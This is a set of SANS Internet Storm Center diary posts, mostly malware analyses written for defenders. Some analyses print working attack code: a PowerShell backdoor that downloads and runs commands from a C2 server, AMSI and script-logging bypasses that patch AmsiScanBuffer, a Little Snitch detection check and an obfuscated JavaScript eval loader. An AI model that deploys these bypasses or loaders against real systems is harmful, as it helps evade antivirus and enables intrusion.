This post was originally published on this site

It's amazing how attackers can be imaginative when it comes to protecting themselves and preventing security controls to do their job. Here is an example of a malicious PowerShell script that patches live a DLL function to change the way it works (read: "to make it NOT work"). This is not a new technique but it has been a while that I did not find it so, it deserves a quick review.

The original script has been spotted on Virustotal (SHA256:b2598b28b19d0f7e705535a2779018ecf1b73954c065a3d721589490d068fb54)[1] with a nice low score (3/60). The original file is interesting because it's a "bat" command line script and a PowerShell script at the same time:

# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -noLogo -noProfile -ExecutionPolicy bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B

The environment variable '%~f0' will expand to the complete path of the script (ex: "C:Tempmalicious.bat"). It is passed to PowerShell which will ignore the first line (starting with the '#'). The script will be deleted once PowerShell completed. Note, '%~dp0' will expand to the drive letter and path of that batch file.

The script itself is obfuscated inside a Base64-encoded string. First, it's a backdoor that tries to execute commands returned by the contacted C2 server. The HTTP connection is built in a specific way to talk to the server:

It requires a specific User-Agent:

$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$eBdd.HEadeRS.ADd('User-Agent',$u);

It tries to connect through the proxy configured in the system:

$EBdD.Proxy=[SYsTeM.NEt.WEBREqUeSt]::DeFAULtWEbProxY;
$ebdd.ProxY.CreDeNTIALS = [SyStEM.Net.CredeNTiAlCAche]::DeFauLTNETWoRKCreDeNtIalS;

A cookie is required:

$eBdd.HeAdErs.Add("Cookie","session=i9jI6+TRpy75U2v68M56EtGXOWE=");

The C2 address is obfuscated:

$ser=$([TEXT.EncoDing]::UNicODe.GEtSTrInG([ConvERT]::FRoMBAsE64STriNG('aAB0AHQAcAA6AC8ALwAzAC4AMQAyADgALgAxADAANwAuADcANAA6ADEANQA0ADMAMAA=')));
$t='/admin/get.php';
$daTa=$eBdD.DoWnLoadDaTA($seR+$T);

The C2 server is hxxp://%%ip:3.128.107.74%%:15430/admin/get.php.

Data received by the C2 are decrypted and executed via Invoke-Command (so, we expect PowerShell code)

$K=[SysteM.TExt.EncOdiNG]::ASCII.GeTBytEs('827ccb0eea8a706c4c34a16891f84e7b');
$R={
    $D,$K=$ARgS;$S=0..255;0..255|%{
        $J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;
        $H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];
        $_-bXOr$S[($S[$I]+$S[$H])%256]
    }
};

$Iv=$daTa[0..3];
$DAtA=$data[4..$DAtA.lenGtH];
-JoiN[CHAr[]](& $R $DatA ($IV+$K))|IEX

But the most interesting part of the script was the technique implemented to prevent the PowerShell script to be blocked by the antivirus.

First, it tries to disable ScriptBlockLogging[2]:

$vaL=[CollECtionS.GEnErIC.DiCTIONarY[StrING,SysteM.ObjEct]]::nEW();
$Val.AdD('EnableScriptB'+'lockLogging',0);
$VAl.AdD('EnableScriptBlockInvocationLogging',0);
$b399['HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging']=$vaL

Then, it tries to disable the API call AmsiScanBuffer() provided by amsi.dll. How? By patching the function and overwriting the beginning of the code with a simple return code to disable the function:

$MethodDefinition = "
  [DllImport(`"kernel32`")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  [DllImport(`"kernel32`")]public static extern IntPtr GetModuleHandle(string lpModuleName);
  [DllImport(`"kernel32`")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
";
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6); 

Step 1: the script tries to locate the address of the function AmsiScanBuffer() in memory. To achieve this, it used the classic combination of GetModuleHandle() and GetProcAddress(). 

Step 2: the memory protection (where starts the function) is changed to allow writing executable code (the key flag is 0x40 or 'PAGE_EXECUTE_READWRITE')

Step 3: the memory location is overwritten with a buffer of six bytes: 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3.

This suite of bytes is the following code:

0x0000000000000000:  B8 57 00 07 80    mov eax, 0x80070057
0x0000000000000005:  C3                ret 

The value 0x80070057 is placed into the EAX register (which is used to hold the return value of the function). This value is 'E_INVALIDARG'. Then, the function immediately returns to the caller with the 'ret' instruction. This technique implements the bypass of the antivirus scan…

As I said, this technique is not new and has already been discussed previously (around 2019) but it's interesting to see how attackers re-use always and always good old techniques.

The fun part of the backdoor? I was not able to connect to it. The C2 seems to be an SSH server. Or did I miss something?

$ curl -v -A 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -H 'Cookie: session=i9jI6+TRpy75U2v68M56EtGXOWE=' hxxp://3[.]128[.]107[.]74:15430/admin/get.php
*   Trying 3[.]128[.]107[.]74...
* TCP_NODELAY set
* Connected to 3[.]128[.]107[.]74 (3[.]128[.]107[.]74) port 15430 (#0)
> GET /admin/get.php HTTP/1.1
> Host: 3[.]128[.]107[.]74:15430
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
> Referer: http://www.google.com/search?hl=en&q=web&aq=f&oq=&aqi=g1
> Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
> Accept-Language: en-us
> Connection: Keep-Alive
> Cookie: session=i9jI6+TRpy75U2v68M56EtGXOWE=
>
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.
* Closing connection 0

[1] https://www.virustotal.com/gui/file/b2598b28b19d0f7e705535a2779018ecf1b73954c065a3d721589490d068fb54/detection
[2] https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1
[3] https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

In TCP, packets with the "Reset" (RST or R) flag are sent to abort a connection. Probably the most common reason you are seeing this is that an SYN packet is sent to a closed port.

But RST packets may be sent in other cases to indicate that a connection should be closed. 

Lets first look at the reset in response to an SYN to a closed port:

IP (tos 0x0, ttl 64, id 0, offset 0, flags [none], proto TCP (6), length 64)
    192.0.2.1.65007 > 192.0.2.2.81: Flags [S], seq 3972116176, win 65535, options [mss 1460,nop,wscale 6,nop,nop,TS val 447631150 ecr 0,sackOK,eol], length 0
16:24:59.928936 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
    192.0.2.2.81 > 192.0.2.1.65007: Flags [R.], seq 0, ack 3972116177, win 0, length 0

Interesting here: The sequence number of the RST packet is 0. If you are looking at "unusually frequent" sequence numbers, "0" may show up at the top if you had a lot of failed connections that resulted in resets.

For an RST in response to an SYN, the sequence number is not really used. This is the first packet arriving from that source, and no further packets will be sent. Also, there is nothing to acknowledge. So the sequence number, if there is one, would be ignored and as a result, the few operating systems I tested (BSD, macOS, Linux, Windows 10) all use a sequence number of 0.

Could this be used to help with spoofing TCP Resets? Not really. As there is no initial sequence number yet, the RST sequence number wouldn't add anything.

A second issue that sometimes causes confusion: RST packets with payload

IP (tos 0x0, ttl 64, id 49111, offset 0, flags [DF], proto TCP (6), length 51)
    192.0.2.43.37444 > 10.0.28.20.25: Flags [R.], seq 1:12, ack 1, win 57352, length 11 [RST 220 mailgat]

The RST packet above has a payload length of 11 bytes. tcpdump is nice enough to display the payload with a "RST" prefix. The actual payload here was "220 mailgat". This behavior is typical for security devices (the trace above is a bit old, but I believe the RST was created by a Cisco IPS at the time). The idea is that the payload will provide more information about why the IPS (and in some cases firewall) sent the RST. Someone once told me that there is an RFC describing this behaviour, but I haven't found it yet (if you know: please comment 😉 ).

—
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Several of our handlers, like Brad and Renato, have written diary entries about malware infections that involved the red team framework Cobalt Strike.

In this diary entry, I'll show you how you can quickly extract the configuration of Cobalt Strike beacons mentioned in these 2 diary entries:

1. Hancitor infection with Pony, Evil Pony, Ursnif, and Cobalt Strike
2. Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike

The configuration of a beacon is stored as an encoded table of type-length-value records. There are a couple of tools to analyze Cobalt Strike beacons, and I recently made my own tool 1768.py public.

The analysis of the sample that Brad mentioned in his diary entry (1) is simple:

In the screenshot above, you can see all the records of the decoded configuration of this sample. Records that you might be most interested in as an analyst, are the server record, the port record and the URL used with GET and POST (highlighted in red).

In Renato's diary entry (2), there are 2 artifacts to analyze.

There's the shellcode: Renato explained how to deal with the different layers of obfuscation of this shellcode.

Here I use different of my tools to deobfuscate the shellcode, and then pass it on to my 1768.py tool:

The payload downloaded by this shellcode is easy to analyze:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

In diary entry "Quick Tip: Extracting all VBA Code from a Maldoc" I explain which options to use with oledump.py to extract all VBA code with a single command.

I promised that I would update oledump.py so that it can also produce JSON output with all VBA code.

This is now done with version 0.0.55. Existing option -j (–json) produces a JSON object with the content (base64 encoded) of each stream found inside the analyzed ole file. Combining option -j and -v produces a JSON object with the VBA code (base64 encoded) of each stream module found inside the analyzed ole file:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

We all run plenty of security tools on our endpoints. Their goal is to protect us by preventing infection (or trying to prevent it). But all those security tools are present on our devices like normal applications and are, therefore, easy to detect. Techniques to detect the presence of such security tools are multiple:

• Detecting processes
• Detecting windows (via the title)
• Detecting configuration (files or registries)
• Detecting injected DLL
• Detecting debuggers
• …

Those techniques remain the same on every operating system (with some deviations of course – the registry is specific to Windows). I found a malicious script targeting macOS computers which implements a very basic check to detect the presence of LittleSnitch[1]. This tool is very popular amongst Apple users. It detects and reports all attempts to connect to the Internet by applications (egress traffic). For malware, it's important to stay stealthy and the presence of LittleSnitch could reveal an attempt to connect to a C2 server.

I spotted a simple Python script (SHA256:e5eb6d879eaca9b29946a9e5b611d092e0cce3a9821f2b9e0ba206ac5b375f8b) part of a red-team exercise, that tris to detect the presence of LittleSnitch:

cmd = "ps -ef | grep Little Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
   sys.exit()

Simple but effective!

[1] https://www.obdev.at/products/littlesnitch/index.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Here is an interesting PowerShell dropper that is nicely obfuscated and has anti-VM detection. I spotted this file yesterday, called 'ad.jpg' (SHA256:b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088). Of course, it's not a picture but a huge text file with Base64-encoded data. The VT score is therefore interesting: 0/61![1]. Once decoded, we discover the obfuscated PowerShell code. Let's review the techniques implemented by the attacker.

First, we see this at the very beginning of the script:

[Ref].Assembly.GetType('System.Management.Automation.'+$([CHAr]([Byte]0x41)+[ChAr]([bYTe]0x6D)+[Char](82+33)+
[ChAr]([BYTe]0x69))+'Utils').GetField($([SyStEM.Net.WEBUTilItY]::htMLdeCode('amsiI 
nitFailed')),'NonPublic,Static').SetValue($null,$true);

Which is deobfuscated into:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils.amsiInitFailed)),'NonPublic,Static').SetValue($null,$true);

This piece of code comes from the PoSHBypass[2] project. It's a  proof of concept that allows an attacker to bypass PowerShell's Constrained Language Mode, AMSI and ScriptBlock, and Module logging.

Then, classic behaviour, we have an obfuscation of the Invoke-Expression cmdlet:

$ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID='MEX'.replace('M','I');
sal g $ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID;

This code will make 'g' an alias of Invoke-Expression. This is used immediately to decode and execute the following chunk of data:

[Byte[]]$IMAGE_NT_HEADERS=('@1F,@8B,@08,@00,@00,@00,@00,@00,@04,@00,@ED,@BD,@07,@60,@1C,@49,@96,@25,@26,@2F,@6D,@CA,@7B,@7F,@4A,
@F5,@4A,@D7,@E0,@74,@A1,@08,@80,@60,@13,@24,@D8,@90,@40,@10,@EC,@C1,@88,@CD,@E6,@92,@EC,@1D,@69,@47,
@23,@29,@AB,@2A,@81,@CA,@65,@56,@65,@5D,@66,@16,@40,@CC,@ED,@9D,@BC,@F7,@DE,@7B,@EF,@BD,@F7,@DE,@7B,
@EF,@BD,@F7,@BA,@3B,@9D,@4E,@27,@F7,@DF,@FF,@3F,@5C,@66,@64,@01,@6C,@F6,@CE,@4A,@DA,@C9,@9E,@21,@80,
...
@34,@6F,@8F,@7E,@8D,@1F,@23,@18,@C7,@CC,@FF,@18,@F3,@84,@A0,@83,@EB,@FB,@70,@EE,@D3,@BB,@BB,@0A,@6B,
@C7,@D2,@E4,@47,@CF,@FF,@B7,@9E,@5F,@E3,@E5,@AF,@43,@5C,@4C,@72,@77,@FF,@FF,@63,@78,@FF,@E8,@F9,@46,
@9E,@FF,@07,@78,@61,@2A,@8D,@00,@42,@04,@00,@00'.replace('@','0x'))| g;

The result string is passed to the following function:

function JAPFYAQPECMKYQNLCJXCOFSVYMER {
  [CmdletBinding()]
  Param ([bYte[]] $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay)
  Process {
    $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput = New-Object System.IO.MemoryStream( , $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay )
    $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut = New-Object System.IO.MemoryStream
    $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE = New-Object System.IO.Compression.GzipStream $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput, ([IO.Compression.CompressionMode]::Decompress)
    $EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL = New-Object bYtE[](1024)
    while($tRUe){
      $BBYRATZNTGIAUBPDRVBIQAMRDMERREread = $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE.Read($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, 1024)
      if ($BBYRATZNTGIAUBPDRVBIQAMRDMERREread -lE 0){bReAk}
      $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.Write($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, $BBYRATZNTGIAUBPDRVBIQAMRDMERREread)
    }
    [bYte[]] $QTXDBVKLTJMGOACBLEIVSJSQHMIDouT = $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.ToArray()
  }
}

It will uncompress the buffer and generate a DLL (SHA256:A7D74BE8AF1645FBECFC2FE915E0B77B287CE09AD3A7E220D20794475B0401F9) which is not present on VT at this time. This DLL is injected in the PowerShell process:

[bYte[]]$decompressedByteArray = JAPFYAQPECMKYQNLCJXCOFSVYMER $IMAGE_NT_HEADERS
$t=[System.Reflection.Assembly]::Load($decompressedByteArray)

Then, another chunk of data is decoded:

[Byte[]]$HNAUVVBGYKNXXMOTZHSTOHTKRMID=('@4D,@5A,@45,@52,@E8,@00,@00,@00,@00,@58,@83,@E8,@09,@8B,@C8,@83,@C0,@3C,@8B,@00,@03,@C1,@83,@C0,@28,@03,@08,
@FF,@E1,@90,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,
@00,@00,@00,@00,@00,@00,@C0,@00,@00,@00,@0E,@1F,@BA,@0E,@00,@B4,@09,@CD,@21,@B8,@01,@4C,@CD,@21,@54,@68,@69,
@73,@20,@70,@72,@6F,@67,@72,@61,@6D,@20,@63,@61,@6E,@6E,@6F,@74,@20,@62,@65,@20,@72,@75,@6E,@20,@69,@6E,@20,
...
0,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00'.replace('@','0x'))| g

This is the main payload dropped by the Powershell (SHA256:A07AE0F8E715E243C514B8DA6FD83C5955E1C8EDE5EEBF4D6494EE97443AAD95). Same here, it's not available on VT yet.

The payload is executed via the following code:

[QuotingUtilities]::SplitUnquoted('control.exe',$HNAUVVBGYKNXXMOTZHSTOHTKRMID)

This function is provided by the injected DLL:

This function implements an interesting anti-VM check that, if running in a virtualized environment, stop the Powershell and prevent the payload to be executed:

Note that I don't know why a popup message is displayed. The goal of malware is to operate below the radar… (maybe the code is still being debugged by the attacker?)

Here is how the VMware environment is detected:

(Maybe there are other tests performed but I did not investigate further)

The DLL is also obfuscated with a tool that I never met before:

If you have more information about this "Zephyrus Protector" tool, please share with me!

The Formbook sample tries to contact the following hosts:

www[.]zenhalklailiskiler[.]online 
www[.]insights-for-instagram[.]com 
www[.]ketaminetherapycalgary.com 
www[.]forwardslashdevelopment[.]com 
www[.]arikmertelsanatlari[.]xyz
www[.]bklynphotography[.]com 
www[.]experiencewinneroftheyear[.]com 
www[.]kansas-chiefs[.]com 
www[.]vrefirsttime[.]com 
www[.]issahclothing[.]com 
www[.]denver-nuggets[.]club 
www[.]wwwhookeze[.]com
www[.]moxieadvice[.]com 
www[.]gangtayvietnam[.]com 
www[.]cosmosguards[.]com 
www[.]magentx2[.]info

[1] https://www.virustotal.com/gui/file/b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088/detection
[2] https://github.com/davehardy20/PoSHBypass

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

The job of security professionals is to protect customers' assets and, even more, today, customers' data. The security landscape is full of solutions that help to improve security by detecting (and blocking) threats knocking on the organizations' doors. Sometimes, such solutions have side effects that go to the opposite direction and make customers more vulnerable to attacks.

Here is a perfect example of security control that could lead to a critical issue. I was looking for data in VT and launched a retro search based on a simple YARA rule (I was just looking for a simple string). As usual, a retro search generates a lot of noise but I always have a look at all files, just in case… I found several emails (EML files) that contained juicy information (translated, the mail was issued from a German company):

Hello Thomas,

the mail (see below) unfortunately did not go through.
I uploaded two files to the Owncloud because they were too big.

These are stored in folder <redacted>

OwnCloud access data:

Guess what? The next three lines of the body contained:

• The ownCloud URL
•  The login and password!

Note: the URL was valid but credentials were of course NOT tested (never try this!)

I found several emails from this company and EML files were submitted always from the same API ID and from Germany. This security control was probably implemented to submit automatically suspicious emails to VT. 

When a customer asks me to have a look at their security posture, I always search for leaked data (from leaked databases, from VT, etc). And, most of the time, it works! It's so easy to find valid credentials to connect to an OWA, VPN, or services like, here, an ownCloud instance.

Based on the example above, some good old reminders:

• From a user perspective:
  • Do NOT share credentials via emails. Don't forget that emails are relayed through many relays to reach your contact and SMTP is a clear text protocol by default and NOT reliable (your email can be delayed and stored on a server while retrying to deliver it).
  • Encrypt your emails.
  • Share passwords via alternative communication channels (pick up your phone and talk to people).
• From a sysadmin or security perspective:
  • When implementing security controls, think about the type of data that will be processed (and stored!).
  • Anonymize and sanitize data before sending them to a cloud service.
  • Don't rely only on login/password, implement 2FA when possible! (in this example, ownCloud does)

Stay safe!

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

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Since new critical vulnerabilities are discovered and published nearly every day, it is no wonder that we (i.e. security professionals and security-oriented media) tend to focus on these and don’t return to the ones that came before too often. Unless there is a massive exploitation campaign, that is. This doesn’t present any problems for organizations, which manage to patch vulnerabilities on time, but for many others the “historical” vulnerabilities, which are not talked about anymore, still pose clear and present danger.

In my last post, we looked at the number of machines connected to the internet, which are still affected by CVE-2020-0796, also known as SMBGhost. Since the number was surprisingly high[1], it got me thinking about how high the numbers might be for other (and older) high-impact vulnerabilities.

Since I don’t have access to any tool, which would come even close to the ability of the Carna botnet to scan the entire internet in reasonable time[2], I’ve decided to go with Shodan once again and ask it for the numbers of machines vulnerable to specific CVEs.

To this end, I’ve put together a list of about a hundred high-impact vulnerabilities, which were discovered before 2020 and which might potentially be scanned for by Shodan. The list was mostly made up of relevant vulnerabilities from different “Top CVEs” lists[3,4] and vulnerabilities I found to be interesting in my previous searches. The list was therefore far from comprehensive, but I do believe the results for the top 10 most common vulnerabilities it included are worth a look.

CVE	Number of affected systems	CVSSv3
CVE-2019-0211	3357835	7.8
CVE-2019-12525	1219716	9.8
CVE-2015-1635	374113	N/A, CVSSv2 10.0
CVE-2019-13917	268409	9.8
CVE-2019-10149	264655	9.8
CVE-2019-0708	246869	9.8
CVE-2014-0160	204878	7.5
CVE-2019-9787	83951	8.8
CVE-2019-12815	80434	9.8
CVE-2018-6789	76344	9.8

The numbers reported by Shodan were generally higher than I would have expected. Nevertheless, although it is true that Shodan results aren’t necessarily fully up to date or completely accurate, I’ve tried to validate a small subset of the detections manually with relevant Nmap scripts (those, which were not too intrusive) and most of my findings agreed with the results Shodan provided.

Although all the CVEs listed in the table are certainly noteworthy, the ones which I was particularly surprised to see, given their prior media coverage, were:

• CVE-2015-1635, a RCE in IIS web server, for which it – quite fortunately – appears that no one published a full exploit so far – all the available PoCs seem to lead “only” to information leakage and DoS[5],
• CVE-2019-10149, an RCE in Exim MTA, which was mentioned in – among other places – an NSA advisory warning against its active exploitation by a Russian APT group earlier this year[6], and perhaps most surprisingly
• CVE-2019-0708, dubbed BlueKeep, along with a historical favorite
• CVE-2014-0160, also known as Heartbleed.

Especially the results for the last two vulnerabilities show that even very well-known vulnerabilities are sometimes left unpatched for years on end.

Unfortunately, I don’t have data for the historical development of the number of machines affected by Hearbleed, but I can offer you a look at how the numbers changed for BlueKeep over the last 12 months.

Although, as the chart shows, there has been a significant absolute as well as relative decline in the number of BlueKeep-affected machines accessible from the internet, there still appear to be over 240 000 of them. Given how dangerous and well known BlueKeep is, it rather begs the question of how many other, less well-known critical vulnerabilities are still left unpatched on a similar number of systems.

And since any of these might potentially come back to haunt us one day, this would seem to be a question worth asking…

[1] https://isc.sans.edu/diary/26732
[2] https://en.wikipedia.org/wiki/Carna_botnet
[3] https://www.cvebase.com/cve/pocs
[4] https://us-cert.cisa.gov/ncas/alerts/aa20-133a
[5] https://www.trendmicro.com/en_us/research/15/e/iis-at-risk-an-in-depth-look-into-cve-2015-1635.html
[6] https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

In diary entry "AV Cleaned Maldoc" I analyze a malicious document with VBA code that has been removed by anti-virus.

As the VBA code has been wiped, no M or m indicators are present:

I've updated my oledump.py to add a ! indicator for such streams:

I also compiled an overview of oledump's indicators.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Yesterday I found an interesting JavaSvript script delivered through a regular phishing campaign (SHA256:70c0b9d1c88f082bad6ae01fef653da6266d0693b24e08dcb04156a629dd6f81) and has a VT score of 17/61[1]

The script obfuscation is simple but effective: the malicious code is decoded and passed to an eval() function to be executed:

function wrwrwrwererw(iyuiyiyuiyiyyui,jljkljkllljkllklklkj) {
    var wqwqsdasda;
    var popopoppop="";
    var xxxxxxxzzzzzzzzzz=(iyuiyiyuiyiyyui+"").split("");
    var rwerwwrwrww0=(jljkljkllljkllklklkj+"").split("");
    var ererrer545=rwerwwrwrww0.length;
    for (var aaaaa888=0;aaaaa888<xxxxxxxzzzzzzzzzz.length;aaaaa888++){
        wqwqsdasda=xxxxxxxzzzzzzzzzz[aaaaa888].charCodeAt(0);
        popopoppop+=String.fromCharCode(+wqwqsdasda-+1000-(ererrer545+10));
    }
    return popopoppop;
}

WScript.Sleep(5000);
eval(wrwrwrwererw(" <malicious_data> ", "123");

The payload is a string of Unicode characters converted one by one through the wrwrwrwererw() function.

The first character is the 'cyrillic capital letter ef' which has the decimal code 1060. The decoding is performed by the following line:

popopoppop+=String.fromCharCode(1060-1000-(3+10));

The returned char will be '/' (ASCII code 47). You don't have to decode this manually, just replace eval() by echo() and you'll get the decoded script. Let's have a look at it. The new script is also obfuscated but it remains easy to read. At the very beginning of the script, you have got this line:

var g = ["HKCU","HKLM","HKCUvjw0rm","SoftwareMicrosoftWindowsCurrentVersionRun","HKLMSOFTWAREClasses","REG_SZ","defaulticon"];

It's a sample of the vjw0rm worm that was discovered for the first time in 2018! [2]. If you want to have a look at the code, a version is available on GitHub.[3]

This worm has been used multiple times in miscellaneous campaigns and it seems to be still active today. The C2 server is hxxp://dhanaolaipallets[.]com:7974/. Note that, thanks to the new obfuscation technique, the VT score remains low!

[1] https://www.virustotal.com/gui/file/70c0b9d1c88f082bad6ae01fef653da6266d0693b24e08dcb04156a629dd6f81/detection/
[2] https://www.f-secure.com/v-descs/worm_js_vjw0rm.shtml
[3] https://gist.github.com/drole/c22fd13f524f2843c004ecabbce84bb5

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.